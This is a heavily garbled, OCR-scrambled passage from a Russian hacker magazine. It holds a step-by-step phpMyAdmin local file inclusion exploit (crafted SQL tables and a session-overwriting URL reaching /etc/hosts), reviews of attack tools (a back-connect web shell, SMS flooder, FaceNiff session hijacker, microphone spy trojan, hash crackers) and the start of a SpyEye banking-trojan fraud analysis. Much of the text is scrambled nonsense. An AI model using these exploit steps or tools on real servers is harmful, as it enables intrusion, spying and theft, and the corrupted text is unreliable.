: Srr""St: vc/rt~/М11t.r . ,nllllll , • 0. 011 01•111/N 01: tt :H ..,...., u, S

первая рэнкинг , на фон taЬle_пame -имя первой таблицы.

rнt : • : I: 0: C.Witt t. : /rнt : /111/Cf~
t -: •:1:1:"-""""""11"1• s.,...н.,. :/rнt : /loill tc••

• - : • : 0:1 :...,. t f ....,

.,.t..

Наличие на базе д анных т а какой таблицы позволит фу-ты н кции

,.-кнsн : /rнt: /nr/И III/н l.,t •

.,...ltff : • : 0 : S:SJ1tfiii, : / : /Mr/И III/ .. 00flt
t 011 : • : 0 : 0 : 0i..,.tн с--.- s-ct : / : /nrlltl•lмl8flll

PMA_getM lM Е верн ут ь желательный нам конгломерат $GLOBALS[ "mim e_map" ] .
0. Переопределить$_SЕSSIОN[ "relation" ] да тем самым сформиро­
вать желательный нам сосредоточение $cfgRelation.
Это позволительно сделатьдовольно пр осто .

HJ : • : II:KS II: ItJIIIIINI :/:/нrJ HI I/M18fll

ti-:• :I :ISSn :IIIII111811Ael :/:/nr/ ltlll/ 018l.,tl

. -:•:r:ta :o - ,, , ........,. : """"""•-•="..,""I.IIJ мt 011 t •
-:• : I:I ; ..,.,. Sifhptttt :/:/IКI"/ Itiii/MlOfll

=;;~~; :~~~..":".:.~~=~~:-.:~:::~~~~z~~~~;:r~

..

s-.. : • :2S : 0S:StiiiiN11 Slllolltt t lfll ltнr : /t.W/ f,..1/tlif111t ... f"Н:/Hr/Яiii/H I.. I II
..illllll11 : • : 01 :21:1ffl... l1ftfH1tiiii" : /IOff/ f,..l/...-:llff"IIIIII/ IМ1"111•
IJIМI : • :SI:,. : IIIНII.М.h : / :/Hr/ llit/Mittill

,....., :• :., :12:,KIIft HHtr ,и м.-- :t-tl lttllt: / tt.r/ttlll/1111"11111
..,rfliiJif : • :.. :•l:,fllfll".l""" """" :/tllr/ l"ftJ :/ n r J •IIlii/MI .. lll
_acr : • :H:H :acr "....- :/ tiW/ ""ftf : /иr/ ..1Jt/иJ.-t1"
:-r : • :H:H :WC, ,lf1Нfe-nw :/IИ/ •,..1 0-"Wi lc : /nr/1KI111illr•tcJ-rlwclc

Н е выходя с РМА , открываем новую вкладку на спринклер р е равным образом вбиваем
тама такую от сы л ку:

,., : • : 01 : " :"" t tf flct...,. : /-n l •tнt :/llr /IIII•Jи1 .. 011

-

: • :11:11: •1•

lli., v.to

lwlr :l-li •t••t:/..,/ 0111•/иl..l ll

......, : • : 0ffi-" : Hf :NI : ..".I•IIIf1• 011r : /-• l l tHt : /нr/ ..III/ Hlltjllt
•t•ff : • : 0181 : 0: 0Мf" & :/lleМ/Itlff :/11111/tc 011

http: //p hpMyAdm i пLiпdex. php?to keп=< тe кyщий так кен>

::r~;:~=~:; ~~=~~.;~~~~~~~~~:~~~~:..

&sessioп_to_uпset=<*x* > &_SESSION[relatioп][1][commwork]=1

....S• : • : t . . : l ::/•н-1-/U!dii : /)111/JII
%1fll : • : t • : tlll:•lflri .... :/8Н0/~1811 :/Hr /IK11/III IIIIII"III
t "t : • : 0Nt: 0111; .... t l0t :/Hr/~.,.t :/IНO/I KIIJII1JtJIIИII

&_SESSION [ relatioп] [1] [ mimework]=1&_SESSION[ re lation] [1]
[ d Ь]=test&_ SESSION [ re lat ioп ] [1] [ column _ iпfo]=pmatest

llкkН : • : tM : tM : IItr • : .nм-/tlKIII.: /IIII II/Hllf11

lttht ctut JWnt 0t uнd e.g. 0n cll_uнr_tunco then 0t см contМisome d8ngerous ch8r8cttrtsuch n J.lt 0t
recommended to not ute lhe Ltttr~ ln such funcdonl or • ttatt v8f1f"y tht ~ tn _autoJoad().
06
07

08

Которое cr.wt8ЧIIIТ, ЧТО 0CIW4 МW МО*еМ 011ММЬ Nl nap8М8fPW фумlщММ ~)( ICIUICCIММ, ТО СТIНОSМ1ЪСJI
0<пМ011МWМ У"Q8ММ0С"П11 ТИМ L,...,L

~ F;;~;;;;;~;~.~~--~·-~~~IIIWd
04
05

t~~-uиr_rvnc(array(".J.J.J•tclpasswd"CJ-,"tesr));

П об др обнее что касается происходящей не без; через такого метода перезапи от равно
глобальных п е ременны х читай во предыдущем номере жур н ала.

З. Проинклудить местного значения обложка , перейдя по мнению ссылке http ://
phpMyAdmiп /sql.php ? db=test&taЬl e=i пt eger&tokeп=< тe кy щии токе н >.

Если по сию пору прошл касательно нур ма льн о, ведь крохотку ваш брат ш е табли цы iпtegeг появит­

?>

ся со д ержимое файла

Инклуд после __ autoload

/et c/hosts .

ВТОРОЙ ИНКЛУ
Следующий нехилый инклуд , тот или другой да мы от тобой ра сс мотрим , является

После небольшага поиска п что до коду становится яс н о, что-то самый удоб­
ный про нас повестка этой фу-ты н ко ци равно проис х одит во файле

sql.php:

общим ради всей 0.4 .х -ветки phpM yAdm i п " a вплоть впредь до версии 0.4.3.1
включительно . Снова заходим нате формальный сайт отметина да ищем
advisoгy п од названием

~тQ!j>айл от нужными нам ф)"!!IS_Ц""
и!l
я""
м,.._
равно _ _ _ _ _ _ _ __

reguire

опсе ". / libraries/disRlay_tЫ.lib.P-hp_"; _ _ _ _ _ __

/Lесли задана БД, так из оздается ва ж ный пользу кого нас м мастер своего дела из ив $cfgRelatioп

if

(strleп($db))

сле дую щ ий ко д во файле

sql.php:

$mime_map=PMA_getMIME($db, $taЬle);

{

require_oпce " . / libraries/relatioп.lib . php" ;
_$cf_gRelatioп

PMASA-2 011-10. Опять смотрим получи патч, пред­

лагаемый разработчиком , да понимаем, в чем дело? проблемным является

=

PMA_getRelatioпsParam();

__________

foreach ($mime_map as $traпsformation) {
__ $iпc:LY.Qe_file=$j:_r_i!пsformatioп [ "traпsformatioп" ];_ _
if__(file_exists(~Д ibrar i es /traпsformations / " . $iпclude_file))_L

!"!"l!\_displayTaЬle ($res ult,_$disp_mode, $aпalyzed_sql);

$traпsformfuпctioп_пame

=str_replace(" . i п c .php " , "

$traпsformatioп[ " traп s fo r matioп " ]);
Функция PMA_displayTaЬle задана на обложка е

./libraries/ display _

tЫ.lib.php, невыгодный буду служить источником в этом месте е е шифр , не без; кажу лишь, что такое? после этого но

require_oпce "./lib r aries/t raп s forma ti oпs / "

.

$iпclude_file;

вызывается занятие PMA_displayTaЬleHeaders, на кото р ой да формиру­

ется желаемый нам ма из сив

Чтобы показать д касательно э т в рассуждении г по части кода, нам ничего не поделаешь пр ойти следующие

$GLOBALS[ "mime_map" ] .

проверки:

0. $GLOBALS[ " is_ajax_request" ]==true . Л егко п оня ть , что-нибудь для того удо ­
И з вышеперечисленного сле д ует, что такое? к выполн е ния л окал ьног об
инклуда да мы из тобой должны пр оизвес ти сле д ую суп е д ействия:

0. Авторизоваться на phpMyAdmin"e равно построить двум таблицы на доступ­
утнапиштим нам базе данных .
Первую таблицу я если м извлекать , обра щ ая вместе с ь ко

влетворения э т ого усище л овия наш брат должны п ер е предоставить ск рипт лучше п подпорка

параметр ajax_гequest.

0. е==$пum_rows

01

$is_affected. Туту нас неуд варианта: обра ­

щ ение для табли ц е кроме запи из ей, или — или во н а шем обращении ко от крипту

sql .php равным образом вызы­

вая тем от амым нужные нам функции :

принуждён являться кой -л потому sql-зaпpoc . П е рвый модификация азбучная истина ,

другой маленечко сложнее (зк вместе с плоит чтобы второго варианта ищи во
сносках] .

CREATE TABLE "test" ." iпteger" ( "1" INT NOT NULL ) ENGINE=MYISA!i_;
INSERT INTO "test" ." iпteg~(_"l"_j VALUES ( "1" ); _ _ _ __

Разобравшись от условиями, нам остается всего только вспомнить, что-нибудь
цель

Втораятаблицанужнанамдлясозданиякорректногомассива

$GLOBALS[ "mime_map" ] :

PMA_getMIME нам ранее встречалась превыше равным образом что такое? пользу кого форми­
$mime_map я должны пользоваться ход

рования нужного нам массива

ко базе д ин ны х phpm yadmiп или — или кто наделен осуществимость манипулирова­
ния з л еме нтами массива

CREA]J TABLE "test "." pmatest" ( "columп_пame" INT NOT NULL ,
"mimetype" INT NOT NI.J_IJ,_, "traпsformatioп" ТЕ ХТ NOT_NU_LL_, _ __
" traпsformatioп ORtions" INT NOT NULL, "db паmе " ТЕХТ NOT NULL,_
"taЬle паmе" ТЕХТ NOT NULL) ENGINE=MYISAM ; _ _ _ _ _ _ __
INSERT INTO "test" ." gmatest" (" columп пате" . "mimetY.p".,e._"._
, _ _ __
"traпsformatioп ", "traпs_tormatioп_optioпs ", "db_пame ",
"tаЫе_паmе" ) VAIJ)ES (" 0", -".1"_, " .. / .. / .. / .. / .. / .. / .. / .. /etc /дosts " ,
"1", " test ", "iпteger" );
В фон traпsformatioп м ы д олжны указа ть п уть д относительно локального
файла, на закраина db_пame - фамилия пирушка базы данных , которой пр ина дл ежит

$_SESSION. Прич ем д ос т уп для базе д анных
0.4.3.1, этак

phpmyadmiп нам необходим лишь во версии phpMyAdmiп

во вкусе во ибо л ее ранни х версиях су щ ествует возмож н волос перезаписи
глобальныхпеременных .
Итак, во в отношении д ан с вариантов исполь з ования данного инклуда на
версии phpMyAdmiп

0.4.3:
0. Логинимея на phpMyAdmin равным образом создаем нужную нам таблицу :

CREATE TABLE " test " ." pmatest " ( "columп_пame " INT NOT NULL ,
"mimetyge" INT NOT NULL , " traпsformatioп" ТЕ ХТ NOT NULL ,
" tra n sformatioп ORtioп s" INT NOT NULL_,__"_Q_Q_o_a mg_"_ЛXT NOT NULL,_
" taЬle паmе" ТЕХТ NOJ NULL }__ENGI]:J_
E_=_f-1\(_ISI\M_;, _ _ __

ХАКЕР

00/153/2011

Тысяча равным образом единолично инклуд

[J@][R

·">SourceForge- phpmyadmin/phpmyadmin/commitdiff- Mozilla Firefox
!Р.айл

()>авка

i!ИА

ЖУРнал

:iao<naAIO<

~трументы

~

• С Х @ О
(::: http://Pl:Jmyadmn.gitSO<rcefurge.net/git/gi\weЬ.cgl?p=l*!"myadmin/pl"!)myadmn;a=commi1dlff;h=5eeЗS7ae ~ "{} -1..,1~"1_-_Goog___,"--ie-------"P"-"1
D нача,.,...,. страно.ца >\ Лента моеопей
-

"11 •

Самые nonynЯj:>Н>Ie

0

Откrю...,ть •

.1. COokles •

/

оu.ибок CSS мет· ~ Формы·

0:!!1 Графика·

О ИНфо •

Q Раэное •

/? Комтуры • iRJ РаЭМОJЬ!· )i: \IН:тр~ы •

~ КОА • JA] настройо.t •

0::: Sourceforge - phpmyadmin/ ph... j + 0
Flxed

filteriлg

author

of а file path, which allowed for directory travenal,

безграмотный РМАSА...

Herman van Rink <rink8inittouronl >
Thu,

ЗО

Jun 00 01 08:

09:З 0

+0000 (20: 09 +0200)

conrnitter Herman van Rink <r1nk8 inittour по части nl>
Thu,

ЗО

Jun 001 0 08 : 09:З2 +0000 (20: 09 +0200)

ChanqeLoq

P ch tЫоЬ lt!stщ

libraries/display_ tЬl o lib об php

eaoh !ЫоЬ t tWstn

cliff --g1t

а/~

b/CI!a!lgd.oq

index 03f0368 .. 02а94а3 000644 (file)
- -- a/ Change:Loo
Н+ Ь/ChengeLoq

08 -9 , 0 +9, 0 08 ~Нe:adURL: ht.t.p ~ : 0 /phpayadJI.in. svn. sour:ceforqe: .ne:t./ svnroot/ phpayadJtin/t.tunk/phpJII:yA
- [secutity] Fixed poss1Ыe ses:sion aanipulation in nekey authenticatton, :see PIU.SA-2011-5

- [secut:ity] Fixed

pos:siЬle

code inject.ion incase session

variaЬle:s

are coaproaised, see

- [secutity] Fixed tegexp quot.inq issue in Synchtoniz:e code, :see РКАSА - 0011-7
а tile pe.th, vhic:h allowed t or direc:tory traversal, see

+- [:secux:ity] Fix ed tilcering ot

РКАSА-2011-б

PИASA-20 ll w8

З. З.lO.l (2011-05-20)
w (security] xss on Tracking paqe

d1ff --git

a./liЬraries/display tьl o liЬ . pl!p b/liЬraries/display tьl o liЬ . p)lp

inclex 0et333d .. 08бсеЗе 000644 (file )
- -- a/ libraries/ clispl ay tЬl o l ib . php
+++ Ь/libraries/display=tЬl o liЬ o php
08 -1220,7 +1220, 0 08 tunction РИА display"I"eЬleBody("$dt result, "Hs display, $аар, $anal yzed зql ) {
0t ($GLOBALS( •ctqRela~on 0 )[ 0 aiaewotk 0 ) t." i"GLOBALS{ "ctql )( "BrovseiiШ" ] ) (
it (1sset($GLOBALS[ "aiae аер" ]($aeta->nu.e]( "aiaetype " ]) " " isset($GLOBALS[ 0 aiae аар 0 )($aeta->nue)( 0 ttanstotaation" )) "
$inc l ude file • $GLOiALS[ " aiae аер" ] ($aeta->nue ][ "ttanзto ru.tion "] :
$include=tile • PИA_secutePath($GLOBALS[ "aiae_aap"} {$aeta->nue} { 0 ttansfo raation 0 ) ) :

+

!eapty($GLOBALS[ " aiae_ae.p " ] [faeta->nue]

it (file exists ( 0 . /libraties /trenstotaations/" . Hnclude tile)) {
$trWtotatunction_nue • str_replace ( 0 • incophp", " " , -,GLOВALS( "aiae_aap" )[$aeta->naae)( 0 ttansfotaation" ]) :
phpМyAdmin

~

0999-2010- ~ nc . ,AI~ Rмe<Ved

<,
Патч для того LFI-уязвимостей на phpMyдdmin"e

INSERT INTO "test" . "pmatest" (" column_name", "mimetype" , _ __
"transformation", "transformation options" -~ name", _ _ _ __
"t aЬl_g_n_a nш."_)_VALUES_(X-"-L....:/ . ./https://www.scribd.com/. ./.. 0__,_,_/._._j_._._/._etcLhosts", _ _
"1", "test", "<имя несущественный таблицы, для которой я будем обращаться>" );

phpM yA dmin здорово опасны держи shагеd-хостингах . Здесь открыва­
ется грандиозный глазом не окинуть про действий : твоя милость можешь просто-напросто зарегать

особенный аккаунт возьми фолиант но сервере, идеже получай хо дится сайт жертвы, а кроме
n оиметь оный са мый сайт вместе с nомощью дефолтной про таких хостингов
системы у nр авле ния

0. Записываем на сессию нужные нам информация равно тем самым формируем
полезныйдля дальнейшихдействий скопление $cfgRelation:

MySQL базами данны х phpMyAdmin.

НИЕИТОГОВ
Вот так, дорогущий выпивоха . На текущий с утра до ночи тема, казалось бы,

htj:p_:j/._p_b_J2/1YAdmio/iod_gx._JillR?token; <тe~y_щий то~е"-"нl<.
> _ _ _ _ __

такого избитого ба га, как бы лакал ьный/удаленный инклуд, живет равно

&session_to_unset=<*x~> &_SESSION(re lation](l](commwork].=.1_ _ _

процветает. Постоянно находятся новые способы экс nл уатации,

&_SESSION [relation] [1] [ mimelol9r.1<]=1&_SESSION(relation] [1] [ db ]=test
&_SESSION(relation][1][column_info);pmatest

открываются неиспользуемые прежде внутренние резервы языка РНР, а
вот и все непоколебимо п овышается точка знаний ба го коnателей до
всему миру.

0. Заходим за следующей ссылке равно инклудим нужные нам данные:

Особостоитотметитьтотфак~чтодажевтаки х распространенных
отметина х, равно как

http: LLJilliШ!YadminL sgl. JillR ?do_tra n ~fgrmations=1&aj ax_reguest;1
&tаЬlе=<Тут титул nустой таблицЫ>&dЬ=tеst&tо!(еn=<валидный тo~tt2_

phpMyAdmin, равно соответственно текущий дата встречаются уязвимости дан­

ного тиnа. Эти простые данные будто бы по части фолиант , в чем дело? разработчики софта
безвыгодный болт еляют должного внимания зтомутипууязвимостей да безвыгодный хотят nро­

д умать совершенно возможные варианты передачи данных во по части батман сные функции.
В общем, таковой инкл тройка имееттуже самую природу. что-то да предыду­
щий, приблизительно во вкусе основная корень его появления- сие шанс

маниnулирования значениями на массиве

$cfgRelation.

Также могу кинуть камешек в огород тебе, почто пара об n исанных инклуда во

ХАКЕР

00/153/2011

Как было nоказано раньше , их существует немало.
Конечно, приискивать инклуды становится всё сложнее да сложнее,
однако пишущий эти строки надеюсь, почто данная пункт подтолкнеттебя для новым исследо­
ваниям . :::К:

075

ВЭЛОМ/Х-ТООLS

Marlicq 084888, http://s nipper.rul

X-Tools

СОФТ ДЛЯ ВЗЛОМА И
АНАЛИЗАБЕЗОПАСНОСТИ

ОС:

ОС:

ОС:

Windows 0000/
ХР/2 003 Server/
Vista /2008 Server/7

*nix/win

Windows 0000/
Х Р/2 003 Server/
Vista /20 08 Serve r/7

Автор:

profexer
Автор:

......
·-·

Автор :

ФIМ"1CQ:nl~-:

cOn Difesa

РНР- ВЕБ-ШЕЛЛ
Очень то и дело пред нашим братом встает проблема

~~y~~eJCQSNS~.ьr

0

0 ь;;;;- . ICOJ

JiJ

Zdez BiiYa

P.A.S.

Оченьдавно на наших обзорах невыгодный было никаких

На очереди пока что одна классная nрограмма через nо­

восстановления строки в области ее МD5-хешу. Не

веб-шеллов . Настало момент исnравить зто недо­

стоянного фигуранта нашей рубрики

менеечастотакаязадачауспеш н овыполняется

разумение. Встречаем:

Как следовательно изо названия,

P.A.S.[phpweb-shell] ото

Zdez Bil Уа .
ICQ sms flооdег-зто смс­

со через разнообразных словарей, разбросан­

мембера форума гdot.oгg ргоfехег"а. Помимо всей

флудер мобильного телефона, сотрудничающий после

ных сообразно Сети. Но ась? делать, ежели подобный головка бо-бо

стандартной функциональности, шел л имеет шпалеры

запись

растягивается нате обтекающе длинный эпоха да во

фишек:

словаряхnросто-напросто нетискомой строки?

0.
0.

ICQ. Особенности

равно функционал тулзы:

nоддерживаются постоялый двор МТС , Билайна равно

Авторизация согласно кукисам .

Мегафона ;

Шифрованиешелла твоим собственным

единственный штучка

строк равно пример их хеш а от целевым. Этот про­

ключем: согласно адресу bit.ly/г36L3k позволяется скопить

текстабонентуприходитввиде"rпрефикс*,

цесс равным образом называется бру т форсом .

шел л не без; уникальным nа рулон ем. А nарольдля

icq] *текст*";

Намостаетсятолько посимвольнаягенерация

Выполнение данного процесса сверху одной ма­
шине выглядит п что касается меньшей мере нерационально,

0.

JCQ позволяет отnравить 0 см с;

ш елла для нашемдиске-«1 ».

многоnоточность;

Файловый предприниматель nоддерживаетгруnnо­

статистика отправки см вместе с [ « бзды » да «гуды >> ].

позтомуяиспешу пр едставитыебеспециальное

вое вычеркивание , n еремещение, коnирование,

программноесредство,предназначенноедля

скатывание равно загрузкуфайлов равно директорий.

стандартныхсмска~составляет160символов

SQ L- клиентдля

[латини це й] другими словами

брутфорса держи зараз нескольких ма ш инах .

0.

Итак , DefBгute-зтo учение распределенного

перебора строкдля МD5 - хешей. Данная теория
состоит изо серверной равным образом клиентской частей .

Серверная кусок IDefBгute v1 .0.exe] ваша милость полня ет
фун.к ц ии генера ци и, учета равным образом п ередачи диапазо­

0.
0.
0.
0.

MySQ L, MSSQL,

PostgгeSQL ,

Максимальная протяжённость текста, наравне равно вот всех

00 символов [юникодом, русски­

удобнодам n ить БДи таблицы.

ми символами].

Bind рогt [Ре г!].
Back-connect IPeгl] .
Рогt scanneг IPHPI.

никакие сnе ц иальные знания. Достаточнолишь

BгuteFoгce в основе /etc/passwd в целях

Для вводные положения работы не без; утилитой тебе неграмотный нужны
забить номердля флуда, закидон равно nа положение

SSH,

ICQ,

назначить телекс sms, подобрать число n отоков

нов строк клиентам . Клиентдля DefBгute пред­

FTP, РОРЗ, MySQL, MSSQL, PostgгeSQL

да придавить держи кноnку вместе с зеленой стрелкой. Дальше

ставляет с лица консольное приложение, размер

со возможностью настроек.

флудер всё сделает после тебя.

Выnолнение неподвижность нд ОС равным образом РНР-кода

Также во комплекте подходит nрограмма << ICQ sms
check>> к отбора номеров со достуnными SMS.

запуска которого следующий:

0.

различными способами.

0О. Малый размер [15 Кб].

Работа не без; чекером как и выглядит хватит три­
виально: выбираем начальный обложка со номерами

Кроме этого, не дозволяется не. пометить удоб ны й

телефонов, выбираем nотоки, вводим nутьдля

вор находящуюся за aдpecy www.defec. г u/node/4

Также горячо рекомендуютебе nрочи­

воздержанный проектирование скриnта : темнокожий фон равным образом вер­

сохранения файла не без; результатами nроверкии

статью автора об особенностях функционирова ­

стка соответственно центру экрана вечно были равно будутсамым

получи выходе n олучаем номера, n одходящие чтобы

ния равно nроцессе создания nрограммы .

удобным вариантом.

конструкция ног относительно флуда.

076

ХАКЕР

00 / 053/ 0011

X-Tools

ОС:

Android
Автор:

bponury

FACENIFF: УГОН ЧУЖИХ СЕССИЙ СО СМАРТФОН.А;
FaceNiff-этo сызнова больше безбашенное формирование

бери любом Аndгоid-смартфоне включить таковой

идеи аддона Fiгeshe ep, составитель которого впервинку

хек-инструмент да перенимать аккаунты самых

есть угонка чужих НТТР-сессий доступным

разных сер висов:

для того любых желающих. Установив распространение

равным образом т. д.- итого побольше 0О. Все, аюшки? нужно, -это

FaceBook, Twitteг, ВКонтакте

Fiгeshe ep во кровный Fiгefo x, дозволено заключая ни аза

пристроиться ко нужной беспроволочный бредень равно

безвыгодный делая п ерехватить сессии

запустит ь прило жение !можешь поглядеть ви­

Facebook, Twitt eг,

Flickг да Amazoп.com тех пользователей, которые

деодемонстрацию : Ьit.ly/qbzwGh l. Правда , дай тебе

работали во праздник но беспроволочный се ти равным образом малограмотный исполь­

сдержатьпотокскрипкидис,авторограничил

зовали безопасные способы аутентификации.

максимальноечислосессий тремя-дальше

Таким образом исследовательхотел мобилизовать

нужно перевоплотиться для разработчикуза специаль­

почтение для этой проблеме отнюдь не исключительно специали­

ным активационным кодом.

стов в области ИБ, однако равно широки х масс .
Со зда тель

FaceNiffтpeбyeт наличия телефона возьми Aпdгoid
не без; рут-доступом. При этом возлюбленный отличный себя чув­

Fa ceNiff езжай единаче опосля да

прилож е ния! Да-да , скача во арk-пакет вместе с про­

ствует во любых, ажно защищенных сетях IWEP,
WPA равно WPA21. Единственное пр е пят ствие-это

граммой ( faceпiff.poпuгy. пet l, позволено чуть было не

используемая на путы методика ЕАР.

реализовал идею F iгesheep на виде мобильного

ОС:

ОС:

ОС:

Windows 0000/
XP/2003Server/
Vista/2008 Server/7

Windows 0000/
Х Р/2003 Server/
Vista/2008 Server/7

Windows 0000/
ХР/2003 Server/
Vista/2008 Server/7

Автор :

Автор:

Автор :

SLESH

FlameofSoul

xmadstyle

ЕМАIL-ГРАББЕР XSPRY
Если твоя милость помнишь, во прошлом выпускеХ-Тооls

Теперь nереходим ко замечательному мыльному

Теперь а ну вернемся ко взлому

был описан необыкновенный микрофонный

граббер усище лаконичным названием XSpгyt. Данная

мательно за смотрим сверху прогу

переносчик

для га поможетт ебе легко и просто равно аллегро спарсить однако

MD5 равно вни­
MD5 Опliпе Sсаппег,
созданную мембером Античата xmadstyle спе ци­

показать тебе изумительную модификацию

встреченные email-aдpeca от выбранного тобой

ально к прогона хеш ей п об специа лизирован ­

данной программы по-под названием

сайта, а засим твоя милость поуже самостоятельно в корне сможешь опре­

ным онлайн-сервисам .

MicSpy через Слеша. Теперь но пришло эпоха
MicSpySE

IStгeam Editionl .

членить ся, чтоделать из полученным списком. Но

Основная фича данной утилиты, наравне очевидно с
названия, заключается во том, сколько бряцание передает ­

Итак, данная обслуживающая программа представляет лицом

помни , что-то наша сестра денно и нощно были равным образом будем сравнительно вместе с чем вместе с пама!

ска нер МD5-хешей держи пр е дм ет их наличия на раз­

До стоинства да бедность проги:

личныхонлайн-базах .

ся наблюдателю на налет оковам режиме. Основные

однопоточность;

изменения за сравнению не без; предыдущ ей версией

заданиетай м-аута;

многопоточность !до 050 потоков!;

шпиона:

низкое потребл ение сис темны х ресурсов;

мочь выбора формата входных

неприбытие админки;

отсутствиеэвристикиlсайтнесканитсясам~

равным образом выходных данных;

из-за письзву ка вяще отнюдь не производится на файлы;

ликвидация дубликатов;

реальность выбора онлайн-сервисов

существенноуменьшен размер: сообразно сле

прибережение пройденного близ крахе;

<<на лету»;

упаковки UРХ"ом ра зме р будетсоставлять

подробные отчеты за найденным мыла м равным образом

возможностьсканирования изо грудь

всего-навсего

пройденным ссылкам .

иначе говоря файла;

0632 байта;

Особенности сканера :

передачаданныхвпсевдопотоковом

Работа не без; прогой выглядит достаточнотривиально :

режиме от невод ;

0.

осуществимость проелушивания потока

0. Дальш е грабб ер своевольно попросит учредить всё, аюшки?

вследствие

WinAmp;

осуществимость одновременного

подключения256пользователей .

Запускаем ехе-файл .

во бампер либо — либо файл;

н еобходимо чтобы альфа и омега парсинга.

grabber.exe -h

winne.com -р 00 -t зеее. Здесь габариты обо­
Использовать филер безграмотный просто, а архи про­

укромный

GUI, возможностьсворачивания втрей .

Прогаподдерживаеттакиеизвест ныеонлайн -

Также твоя милость совершенно побег пешно сможешь делать вместе с
утилитой равно близ помощи консоли:

мочь сохранения результатов

сервисы, как: cOIIisioп . пet , tmto . oгg , www.md5this .
com , md5.hashcгackiпg.com , md5online.net ,
hashkilleг.com равно е ще поблизости 0D других.
Особое напирать следуетобратить для удоб­

значают сле д ующее :

h- хост(без http://l;

нейшие встроенные макросы, используемые подле

ась? позволяется натравливатьлюбой потоковый

р-порт;

экспорте равно импорте списков хеш ей во сканер:

плеер получай домицилий http://[IP жертвы]:4545. Осталось

t-тайм-аут во микросекундах.

всего-навсего прикрутить н ехит рую вероятность back

Все из парсенны е мыльникисохраняются на

сто: возлюбленный загружается для электронная вычислительная машина жертвы, задним числом

con nect "a -и тулза довольно на поверку бесценной.

txt; ссылки про

mail.

парсинга, которые твоя милость приготовил

загодя интересах определенного сайта, кидай на liпk . txt.

ХАКЕР

00/153/20 01

[MD5] -текущий хе ш;
[DATA] -твои комментарии lлогин, пена равным образом т. д . l ;
[ТЕХ Т]- исходная ст рока на хе ш а lпарольl;

[SERVICE] -адр есть сер ви са, расшифровавшего хеш.

077

MALWARE

Сергиян Никитин

вылаз
зла
МАСШТАБНЫЙ ТРОЯ Н

SPYEYE ПОДХАКЕРСКИМ
МИКРОСКОПОМ
В ходе проведения расследования
одного изо инцидентов на наши шуршалки

досталось на калачи управление для известнейше­

му вредоносному ПО- SpyEye. Что
самое примечательное , учебник

было вроде для английском, приблизительно равным образом держи рус­

-

В этой статье рас·

сматривается SpyEye
версии v1.3.25 с

д ля DD oS"a, расс ы лки не без; n ама, сове рш ени автор этих строк мо ш е ннич yes тв от
nл а тежными системами. Spy Eye прекрасно ич н насчёт n что до д движение равно т н а рулон ь

На нашемдискетебя

ба н ковско готроя н а, возьми це л е н так го бери со во ер ш е ни е мо ш е н н ич е ­

ждетполная разновидность
не без; татьи , содержа­

щая справочник всех

ключей, плаrинов да
прочих тонкостей,

мента пишущий сии строки рассмотрим, что-нибудь представ­

ж иваетбумажная

SpyEye вместе с точки зрения

ботн ет ов: на ирусы ст р емя тся ко цент р а л иза ц ии равным образом
а на томатиза ц ии. Кру nн ей ш иебот н е твоя милость равным образом со n по части л ьзую тс мы

04.03.2011.

ском языках . На примере сего доку­
ляет изо себя

n

ос л е дн ее на ремя мож н в рассуждении сме л что до от ч да т ать э n охой

которые безграмотный выдер­

модификация журнала.

хакера, а малограмотный вирусного аналитика.

от тва не без; n омо щ ью сис т ем д иста н цион н ого ба н ко на ско го обслу ­
жи на а н ия. Spy Eye расnрос т р фактически яет ся во во да д е гот об во насчёт го n родук та ,
а в духе его ис n ол ь зо на а т ь-ре ш итсам n оку n а т е ль .

СХЕМА МОШЕННИЧЕСТВА
П е р на ы м д елом з л оумы шл енник n oкy n aeт S py Eye !думаю,
дл аз многогрешный т ебя далеко не секрет, ч так ко д пишущий эти строки тт ро яны в отношении д ни л юд и, а равным образом из n что до ль зу­

ю т- капли д ру г ие ! . В колтун nл ект е ид етсе рв е рн ая равно клиент­
ская ч маг и волшебник т и, на т ом ч равно от л е би лдер б от в. Ко н т р насчёт лл е р Ботн е та
р азме щ ает не без; аз многогрешный во Сети, з л оум ышл е нн ик n относительно ку n аетт р афик ради
зараже ни аз многогрешный комок n ьюте р насчёт на . Зач а стую вз л омом овраг т в отношении на равно р аз­
м е щением экс пл ой т-n ако во следовать н имают вместе с мы д ру г ие л ю ди -т е,

кото ры е nр одаюттра ф ик про ботик нетов. Ст а т ис т ика побег п е шн насчёт г касательно
С х ема мошенничества со ДБО

зараже н ия соста во ляет близ

00 %. П ос л еза р ажен ия килоом п ью­

т ерс та н ови тсяботомиот сы л аетмассу д а нн ых н ако н тро л ле р

МОШЕННИЧЕСТВО В ДБО

ботик н е та. Ф унк ц иона л

SpyEye на нашел ь ма об ш ире н равным образом может накануне n относительно л ­

н ят ь ся п разрыв равно нами. Зл оум ышл е нн ик че р ез а д ми н ис т р ат равным образом вн ую
n а н е ль конт р по части лл е р аможетсо во ер ш ат ь м а ссу дейс тв ийсбото м ,

Покупка вредоносного ПО

во т ом ч равным образом сле п относительно д для л ю ч ат ь ся ч е р езуд а л е нн оеу n ра вл ени е да nр по части ­

на оди т ь n л атеж равным образом ч е р ез со да стему ДБ О. Л огины/па р по отношению ли для из равным образом из те ме
ДБО, n равно н- ко ды ко токе н ам п охи щ аю тся че р ез часть ск рытн относительно го

Шифрование исполняемых файлов

ко 14 ро на ани яда н ных изо р я л ич н ых ф касательно р м -ф по части р м гр аббер.

Арендасерверовдляуправленияботнетом

альная в рассуждении n е р а ц ио нн ая концепция GNU/L inu x D eb iaп 0.0. В э т ой

П ос л е n охи щ е нные денеж н ые не без; р едс тв а л е г ализуют от моя особа .

Гл а вны м равным образом н из т руме нто м губы н овки Spy Eye мы вля етс автор этих строк во ирту­
ОС ужеустанов л ен веб-се рв е р вмес т е от п а н е лью у пр а влен ия

форм гр аббера, а т а ко но ssh-к л ие нт равно п ро ч ий инст р уме н та р ий .

Покупка трафика во определенных регионах РФ

Р акробат воздуха nр ос т раняется во на иде ви ртуа л ь н ой ма ш да ны Vi гtu ai B ox.
Гл а вн ая n ане ль у n ра вл е н равным образом моя особа н уже н а дл ваш покорнейший слуга у ч ет а из та т ис т ик да п в отношении

Отправка платежных поручений

бота м , а т акже дл автор у пр а вл е н равно ваш покорный слуга ими. Для ее ра лодка ы н еобхо ­
партия побег т а н ов л е н ный веб-се р ве р из п оддержкой РНР, а та для но
MySQ L-cepвep. Фавн е л ь р аза д кой-как н а бери се рв е рн ую да для ли е нтскую

Вывод равно узаконение денежных средств

ч мастер своего дела т да . К обеим пр равным образом л а г аю тся ан не без; т а ллят относительно ры. Се рв е рн ая ч акробат воздуха ть
